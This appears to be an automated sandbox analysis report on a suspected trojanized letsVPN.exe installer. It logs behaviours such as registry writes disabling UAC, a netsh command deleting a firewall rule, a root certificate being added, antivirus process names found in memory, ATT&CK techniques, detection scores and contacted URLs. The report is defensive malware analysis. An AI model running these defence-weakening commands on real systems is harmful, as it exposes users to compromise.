              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_0038F510 ??1LogMessage@logging@@QAE@XZ,CreateMutexW,CreateEventW,RegisterWaitForSingleObject,CreateNamedPipeW,SetEvent,17_2_0038F510
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000014006BC9C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_000000014006BC9C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C578D59 _lock,__tzname,_get_timezone,_get_daylight,_get_dstbias,___lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,__timezone,__daylight,__dstbias,strcmp,free,strlen,_malloc_crt,strlen,strcpy_s,_invoke_watson,free,strncpy_s,atol,atol,atol,strncpy_s,__timezone,__daylight,17_2_6C578D59
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00381880 ??1FilePath@base@@QAE@XZ,?Base64Encode@base@@YAXABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,??3@YAXPAX@Z,?ASCIIToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z,?WideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,memset,GetVersionExW,GetVersionExW,GetVersionExW,memset,VariantInit,VariantClear,VariantClear,VariantClear,?WideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,17_2_00381880
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Windows\System32\reg.exeRegistry value created: PromptOnSecureDesktop 0
              Source: C:\Windows\System32\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\QqXF5.xml
              Source: sinaplayer_service.exe, 00000011.00000002.3899629522.0000000002D0B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: kxetray.exe
              Source: sinaplayer_service.exe, 00000011.00000002.3899629522.0000000002D0B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: avp.exe
              Source: sinaplayer_service.exe, 00000011.00000002.3899629522.0000000002D0B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
              Source: sinaplayer_service.exe, 00000011.00000002.3899629522.0000000002D0B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 360tray.exe
              Source: sinaplayer_service.exe, 00000011.00000002.3899629522.0000000002D0B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: a2guard.exe
              Source: sinaplayer_service.exe, 00000011.00000002.3899629522.0000000002D0B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 Blob

              Stealing of Sensitive Information

              Source: C:\Windows\System32\svchost.exeRegistry value created:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_003863C0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_003863C0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_0037E460 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_0037E460
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_003804D0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_003804D0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_0037E510 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_0037E510
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00376600 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00376600
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_003876E0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_003876E0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_003766C0 ??1LogMessage@logging@@QAE@XZ,??1LogMessage@logging@@QAE@XZ,??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_003766C0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387790 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387790
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387830 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387830
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_003878E0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_003878E0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387990 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387990
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387A30 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0FilePath@base@@QAE@ABV01@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387A30
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387AE0 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387AE0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00386AC0 ?AddRef@RefCountedThreadSafeBase@subtle@base@@IBEXXZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00386AC0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387B90 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@QAE@ABV012@@Z,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387B90
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00389B90 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00389B90
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00389C30 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00389C30
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00387C40 ??2@YAPAXI@Z,??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ,??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z,17_2_00387C40
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5BD846 ??0exception@std@@QAE@XZ,??0exception@std@@QAE@XZ,_CxxThrowException,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,17_2_6C5BD846
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5BD643 Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,17_2_6C5BD643
              [MITRE ATT&CK matrix. Columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact]
              [Techniques listed with a count: Scripting; Replication Through Removable Media; Windows Management Instrumentation; LSASS Driver; Disable or Modify Tools; Input Capture; System Time Discovery; Archive Collected Data; Ingress Tool Transfer; System Shutdown/Reboot; Native API; DLL Side-Loading; Deobfuscate/Decode Files or Information; Peripheral Device Discovery; Encrypted Channel; Command and Scripting Interpreter; Bypass User Account Control; Obfuscated Files or Information; File and Directory Discovery; Clipboard Data; Non-Standard Port; PowerShell; Windows Service; Access Token Manipulation; Software Packing; System Information Discovery; Non-Application Layer Protocol; Registry Run Keys / Startup Folder; Timestomp; Query Registry; Application Layer Protocol; Process Injection; Security Software Discovery; Process Discovery; File Deletion; Virtualization/Sandbox Evasion; Masquerading; Application Window Discovery; Modify Registry; System Network Configuration Discovery]
              [Behavior graph. ID: 1582024, Sample: letsVPN.exe, Startdate: 29/12/2024, Architecture: WINDOWS, Score: 62]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| letsVPN.exe | 32% | Virustotal | | Browse |
| letsVPN.exe | 24% | ReversingLabs | Win32.Ransomware.Generic | |
| letsVPN.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Program Files (x86)\letsvpn\LetsPRO.exe | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\Update.exe | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dll | 3% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exe | 3% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe | 3% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Bcl.AsyncInterfaces.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Primitives.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.ClientEngine.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Primitives.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dll | 0% | ReversingLabs | | |

              No Antivirus matches
              No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://foo/Themes/TextBoxDictionary.xaml | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/LetsPRO;component/Themes/TabControllerDictionary.xamld | 0% | Avira URL Cloud | safe | |
| http://foo/bar/themes/tabcontrollerdictionary.bamld | 0% | Avira URL Cloud | safe | |
| http://foo/Themes/TabControllerDictionary.xaml | 0% | Avira URL Cloud | safe | |
| http://logging.apache.org/log4net/release/faq.html#trouble-EventLog | 0% | Avira URL Cloud | safe | |
| http://www.hardcodet.net/taskbar | 0% | Avira URL Cloud | safe | |
| http://foo/bar/themes/windowdictionary.baml | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/LetsPRO;component/Themes/ScrollViewDictionary.xamld | 0% | Avira URL Cloud | safe | |
| http://125.211.213.34/dump.php | 0% | Avira URL Cloud | safe | |
| https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalid | 0% | Avira URL Cloud | safe | |
| http://foo/Themes/ScrollViewDictionary.xamld | 0% | Avira URL Cloud | safe | |
| https://in.appcenter.ms./logs?api-version=1.0.0 | 0% | Avira URL Cloud | safe | |
| http://schemas.fontawesome.io/icons/ | 0% | Avira URL Cloud | safe | |
| http://www.atomixbuttons.com/textcalc | 0% | Avira URL Cloud | safe | |
| http://foo/bar/themes/textboxdictionary.bamld | 0% | Avira URL Cloud | safe | |
| http://foo/bar/themes/radiobuttondictionary.bamld | 0% | Avira URL Cloud | safe | |
| http://wpfanimatedgif.codeplex.com | 0% | Avira URL Cloud | safe | |
| http://logging.apache.org/log4ne | 0% | Avira URL Cloud | safe | |
| http://home.pacific.net.sg/~jupboo | 0% | Avira URL Cloud | safe | |
| http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQ | 0% | Avira URL Cloud | safe | |
| http://rcd.video.sina.com.cn/realtime_pcdesktop | 0% | Avira URL Cloud | safe | |
| http://fontawesome.iohttp://fontawesome.io/license/Copyright | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/LetsPRO;component/Themes/TextBoxDictionary.xaml | 0% | Avira URL Cloud | safe | |
| http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode= | 0% | Avira URL Cloud | safe | |
| https://1wm27s.onelink.me/DPiD/s5eizipo-1 | 0% | Avira URL Cloud | safe | |
| http://www.xmlspy.com) | 0% | Avira URL Cloud | safe | |
| http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=htt | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xamld | 0% | Avira URL Cloud | safe | |
| http://www.winimage.com/zLibDllnetwork_change | 0% | Avira URL Cloud | safe | |
| http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlighting | 0% | Avira URL Cloud | safe | |
| http://foo/app.xamld | 0% | Avira URL Cloud | safe | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| nal.fqoqehwib.com | 10.176.38.125 | true | false | | high |
| www.wshifen.com | 103.235.46.96 | true | false | | high |
| d1dmgcawtbm6l9.cloudfront.net | 13.227.9.159 | true | false | | unknown |
| socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com | 18.136.139.158 | true | false | | high |
| www.google.com | 172.217.21.36 | true | false | | high |
| nit.crash1ytics.com | 223.61.70.52 | true | false | | high |
| yandex.com | 77.88.55.88 | true | false | | high |
| chr.alipayassets.com | 222.91.58.119 | true | false | | high |
| in.appcenter.ms | unknown | unknown | false | | high |
| ws-ap1.pusher.com | unknown | unknown | false | | high |
| www.yandex.com | unknown | unknown | false | | high |
| www.baidu.com | unknown | unknown | false | | high |

Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://foo/bar/themes/textboxdictionary.bamldLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2664706128.0000000004951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
